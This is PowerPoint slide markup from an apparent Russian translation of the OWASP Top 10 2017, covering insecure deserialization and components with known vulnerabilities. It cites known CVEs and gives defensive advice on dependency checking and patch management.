                        <a:t> редко можно использовать без их изменения или доработки.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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="75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750" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>отраслевых исследований</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, а не по количественным показателям.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Некоторые инструменты могут обнаруживать ошибки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="75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50" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, но для их подтверждения обычно требуется участие специалиста. Ожидается, что по мере разработки новых инструментов обнаружения и устранения ошибок </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="75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50" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> данных об их распространенности станет больше.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sz="750" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Последствия ошибок </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>десериализации</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> нельзя недооценивать. Подобные ошибки могут привести к удаленному выполнению кода, одной из самых опасных уязвимостей.</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75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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-39250" y="1061610"/>
            <a:ext cx="542925" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178750" y="1059705"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101250" y="1059705"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5544235" y="1186145"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855880" y="1511660"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="30080" y="1511659"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сценарий №1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Компоненты обычно запускаются с привилегиями приложения, поэтому уязвимость в любом из компонентов может привести к серьезным последствиям. Уязвимость может появиться случайно (например, из-за ошибки в коде) или преднамеренно (например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>бэкдор</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>). Вот несколько примеров эксплуатации уязвимостей, обнаруженных в компонентах:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: уязвимость в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2, позволяющая удаленно выполнить произвольный код на сервере, стала причиной нескольких серьезных взломов;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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уязвимости в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>интернете вещей (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> зачастую сложно или невозможно устранить, а это может привести к серьезным последствиям (например, в случае биомедицинских приборов).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Существуют </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>автоматизированные инструменты, позволяющие злоумышленникам находить уязвимые или некорректно настроенные системы. Например, поисковик </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> позволяет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>обнаружить устройства</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, в которых до сих пор не устранена </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>уязвимость </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, которая была исправлена в апреле 2014 года.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="ru-RU" dirty="0"/>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75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вы не знаете версии всех используемых (на стороне клиента и на стороне сервера) компонентов. Сюда относятся сами компоненты и встроенные зависимости;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ПО содержит уязвимости, не поддерживается или устарело. Сюда относятся ОС, веб-серверы, серверы приложений, СУБД, приложения, API, а также все компоненты, среды исполнения и библиотеки;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поиск уязвимостей выполняется нерегулярно, а также отсутствует подписка на бюллетени по безопасности используемых компонентов;</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своевременно не устанавливаются исправления или обновления для используемых платформ, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>фреймворков</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> и зависимостей. Обычно такое происходит, когда наличие обновлений проверяется раз в месяц или квартал, в результате чего организации неделями или месяцами не устраняют исправленные уязвимости;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разработчики ПО не тестируют совместимость обновленных или исправленных библиотек;</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не обеспечивается безопасность компонентов (см. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-Некорректные параметры безопасности</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="750" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>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r>
              <a:rPr lang="ru-RU" sz="800" b="1"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Стандарт подтверждения безопасности приложений OWASP: V1 Архитектура, разработка и моделирование угроз</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Проверки зависимостей OWASP (для библиотек </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> и .NET)</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Руководство OWASP по тестированию: Установление взаимосвязей в архитектуре приложения (OTG-INFO-010)</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Рекомендации OWASP по использованию виртуальных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>патчей</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId12"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="12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3"/>
              </a:rPr>
              <a:t>Унылая реальность небезопасных библиотек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4"/>
              </a:rPr>
              <a:t>Поиск уязвимостей (CVE) MITRE</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5"/>
              </a:rPr>
              <a:t>Национальная база данных уязвимостей (NVD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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6"/>
              </a:rPr>
              <a:t>Retire.js для обнаружения известных уязвимых библиотек </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="770" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId16"/>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7"/>
              </a:rPr>
              <a:t>Бюллетени по безопасности библиотек </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Node</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Инструменты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>и база данных бюллетеней по безопасности библиотек </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Ruby</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId18"/>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50" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Необходимо реализовать процесс управления обновлениями:</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удалите неиспользуемые зависимости, а также лишние функции, компоненты, файлы и сведения из документации;</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регулярно проверяйте актуальность версий клиентских и серверных компонентов (например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>фреймворков</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> и библиотек), а также их зависимостей, используя такие инструменты как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
